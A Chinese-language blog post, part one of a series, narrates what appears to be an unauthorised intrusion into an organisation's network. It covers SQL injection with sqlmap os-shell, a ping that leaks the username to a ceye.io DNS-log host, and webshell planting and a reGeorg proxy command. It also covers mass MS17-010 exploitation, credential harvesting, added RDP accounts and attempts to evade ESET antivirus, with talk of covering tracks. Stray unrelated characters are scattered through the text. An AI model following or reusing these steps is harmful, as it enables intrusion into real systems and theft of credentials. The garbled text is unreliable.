本文作者 : 重生信安 -?nobgr
?前段時(shí)間看了一下內(nèi)網(wǎng)滲透,所以想找個(gè)環(huán)境練習(xí)一下惶岭,恰好有個(gè)兄弟丟了個(gè)站點(diǎn)出來(lái)示损,一起“練習(xí)內(nèi)網(wǎng)”渗磅,然后就開(kāi)始了“實(shí)戰(zhàn)代練”。由于“懶”检访,所以記錄時(shí)間和截圖有些是補(bǔ)的始鱼。
0x00?外網(wǎng)入口點(diǎn)
打開(kāi)站點(diǎn)(這里用baidu.com替代)看了看,左翻翻右翻翻能看到很明顯的“注入”點(diǎn)脆贵。簡(jiǎn)單測(cè)試一下(and 1=1医清、1=2),返回不一樣丹禀,所以sqlmap一把梭状勤。
sqlmap-uhttps://baidu.com/detail.asp?Prod=2222222222 --random-agent? --thread10
估計(jì)外國(guó)站和帶寬的原因,跑的很慢双泪。所以走了一遍正常的信息收集:
真實(shí)ip:8.8.8.8
Web容器:Microsoft-IIS/7.5
子域名:mailserver.baidu.commail.baidu.com端口:80持搜、443......
發(fā)現(xiàn)頁(yè)面登錄處admin有個(gè)萬(wàn)能密碼,登錄進(jìn)去發(fā)現(xiàn)只有查看賬單的一些功能焙矛,所以沒(méi)用葫盼。
C段發(fā)現(xiàn)用同一套模板的站,判斷是屬同一家村斟,所以也注入點(diǎn)跑了一遍贫导。發(fā)現(xiàn)這個(gè)站跑的比目標(biāo)站快很多,所以先搞蟆盹。
--is-dba為dba權(quán)限孩灯,故os--shell試試,權(quán)限system
兩個(gè)站都是08系統(tǒng)+sql注入+dba權(quán)限+system權(quán)限逾滥,外網(wǎng)入口點(diǎn)太輕松峰档,可忽略,抱著學(xué)內(nèi)網(wǎng)的心態(tài)寨昙。都一樣的站讥巡,所以搞目標(biāo)站。
0x01?中轉(zhuǎn)搗鼓
執(zhí)行回顯得很慢舔哪,加了threads 10也是很慢欢顷。想著上cs和msf,死活不上線捉蚤,懷疑有殺軟或者攔截協(xié)議或者其他抬驴。ceye試一下
ping%USERNAME%.baidu.ceye.io
平臺(tái)有記錄,能通外網(wǎng)缆巧。但是bitsadmin等下載命令都試了怎爵,不上線。走echo寫馬路線盅蝗。
先找到web的目錄鳖链,目錄在C盤根目錄?
寫了n次馬子墩莫,愣是沒(méi)上去芙委,位置不對(duì)還是有查殺小馬的玩意?嗯狂秦,位置不對(duì)(猜可能有其他盤灌侣,d盤bingo)和好像還有個(gè)殺馬子的玩意(用了個(gè)大小寫換下,^是轉(zhuǎn)義字符)裂问。
0x02?沒(méi)思路亂搞系列
查看進(jìn)程侧啼,之前發(fā)現(xiàn)有進(jìn)程有ekrn.exe牛柒,egui.exe(eset的進(jìn)程),不會(huì)免殺的我浪死在沙灘上痊乾。之前在刀上能執(zhí)行命令的皮壁,這次回去補(bǔ)圖居然執(zhí)行不了命令了。sqlmap那個(gè)執(zhí)行回顯太慢哪审,找張內(nèi)網(wǎng)機(jī)子的圖補(bǔ)一下(它內(nèi)網(wǎng)機(jī)子都裝了eset)蛾魄。
翻翻文件(無(wú)腦子的翻,不確定哪些重要哪些不重要湿滓,感覺(jué)都重要)滴须,看看有什么數(shù)據(jù)庫(kù)密碼什么的。找到一些配置文件叽奥,發(fā)現(xiàn)數(shù)據(jù)庫(kù)密碼扔水、郵服密碼?朝氓。(在某個(gè)文件夾里面發(fā)現(xiàn)同行的腳本铭污,應(yīng)該沒(méi)被日穿吧。)
先留著這些賬號(hào)密碼膀篮,msf有個(gè)sqlserver賬號(hào)密碼之后命令執(zhí)行的模塊和存著之后可能的爆破操作嘹狞。用reg的http代理試試賬密能否搞得到東西,
python reGeorgSocksProxy.py -p 1080 -u http://baidu.com/reGeorg.aspx誓竿。
再試一波能內(nèi)網(wǎng)常見(jiàn)的高危:17-010磅网、08-067這類供常,能直接get的先get(搞不好打到域控啥的重要機(jī)子呢)喊崖。最后17-010打下內(nèi)網(wǎng)很多機(jī)子,其他的漏洞或者端口掃描就先暫停了块差。
白天掃的時(shí)候很多機(jī)子毙死,晚上再掃發(fā)現(xiàn)少了很多燎潮,那些應(yīng)該是員工的機(jī)子(下班得關(guān)機(jī)吧)。
子網(wǎng)掩碼255.0.0.0扼倘,懷疑不止一個(gè)段(其他網(wǎng)卡段還沒(méi)看)确封。大概翻了一下,10.1.1到10.1.6的ip都有在用再菊。
?
0x03 eset免殺問(wèn)題
翻了幾個(gè)機(jī)子的tasklist和嘗試ms17-010的反彈爪喘,發(fā)現(xiàn)eset這個(gè)鬼殺軟好阻礙干活。上傳的工具都死掉了纠拔,沒(méi)搞定這個(gè)殺軟估計(jì)沒(méi)得搞了秉剑。(雖然有個(gè)代理可以搞了,但是上個(gè)msf有利于后續(xù)操作)剛開(kāi)始還想著添加賬戶3389過(guò)去“手動(dòng)免殺”稠诲。后來(lái)找了下加殼在本地測(cè)試能文件免殺侦鹏,但是嘗試msf或者cs的又馬上殺掉了诡曙。于是又找到了個(gè)shellter捆綁正常的putty.exe免殺,這會(huì)回去復(fù)現(xiàn)寫文章已經(jīng)不免殺了略水。于是有了shellcode免殺操作价卤。
用了下這個(gè)shellcode加載器
https://github.com/clinicallyinane/shellcode_launcher/
,醉了這都?xì)⒕矍搿eil也試過(guò)不得,改了下別人的shellcode_launcher稳其,也還是殺了驶赏,不會(huì)免殺寸步難行,暫時(shí)放棄(taskkill掉既鞠?別煤傍,不過(guò)好像也kill不掉,“手動(dòng)”免殺嘱蛋?別蚯姆。學(xué)一波免殺吧,這flag立了好久洒敏,自己改自己寫吧龄恋,太水都不好意思問(wèn)大佬。準(zhǔn)備閉關(guān))凶伙。
?
0x04?內(nèi)網(wǎng)亂懟
免殺方面過(guò)不了郭毕,只有代理腳本搞內(nèi)網(wǎng)了。整理一下信息函荣,外網(wǎng)的兩臺(tái)web在一個(gè)內(nèi)網(wǎng)上显押,在對(duì)應(yīng)機(jī)子上找到兩個(gè)sqlserver的賬密,17-010能打下的1段機(jī)子傻挂。目前能拿下的機(jī)子:
10.1.1.2(web1乘碑,sqlserver)10.1.1.6(web2)10.1.1.10(445)61(445)22(445)68(445)94(445)105(445)161(445)199(445)......
代理有點(diǎn)問(wèn)題,時(shí)不時(shí)中斷金拒,有些命令得執(zhí)行幾遍兽肤,445在這個(gè)內(nèi)網(wǎng)能收割很多。因?yàn)椴恢挂粋€(gè)段绪抛,有些機(jī)子也不止一個(gè)網(wǎng)卡轿衔,所以現(xiàn)在只記錄10.1.1.0/24的,其他段操作都差不多睦疫『裕基礎(chǔ)信息收集那堆就不敲了(能百度谷歌出來(lái)的問(wèn)題不是問(wèn)題吧,這篇感覺(jué)是最友好之一內(nèi)網(wǎng)的文章),在一波信息收集之后蛤育,發(fā)現(xiàn)存在域宛官。則直接找域控葫松,在199找到很多用戶,這臺(tái)應(yīng)該是臺(tái)域控底洗。
在10也找到了個(gè)krbtgt賬戶腋么,不同的域名。
簡(jiǎn)單檢測(cè)一下199(當(dāng)時(shí)想著過(guò)去手動(dòng)關(guān)閉殺軟亥揖,搞到域管擦屁股跑路)珊擂,ping和dnslog測(cè)試過(guò),應(yīng)該不通外網(wǎng)费变。添加用戶晚上3389連了過(guò)去摧扇。這里也遇到坑,添加的用戶登錄不進(jìn)去挚歧,net系列命令沒(méi)有回顯扛稽。直接添加用戶是域用戶?后面systeminfo發(fā)現(xiàn)個(gè)域名滑负,之后登陸的是加個(gè)域名才登陸進(jìn)去在张。
不通外網(wǎng),看到了eset這個(gè)殺軟矮慕。
剛想手動(dòng)免殺帮匾,然后被大佬笑了,所以卡在eset這玩意上面痴鳄,抓密碼等等操作不了(之前shellter過(guò)免殺的還是能抓到hash辟狈,hash碰撞也ok,一波偷懶時(shí)間過(guò)去就涼了)夏跷,現(xiàn)在就只有全程sqlserver賬密和17-010執(zhí)行命令哼转。
0x03?下篇:鯊魚師傅的操作
由于某些原因,鯊魚師傅接手搞了這個(gè)內(nèi)網(wǎng)槽华,請(qǐng)客官們 搬好小板凳觀看:
? ? ? ? 《記一次內(nèi)網(wǎng)實(shí)戰(zhàn)之不會(huì)免殺(下)》
ps:記得留言點(diǎn)贊分享
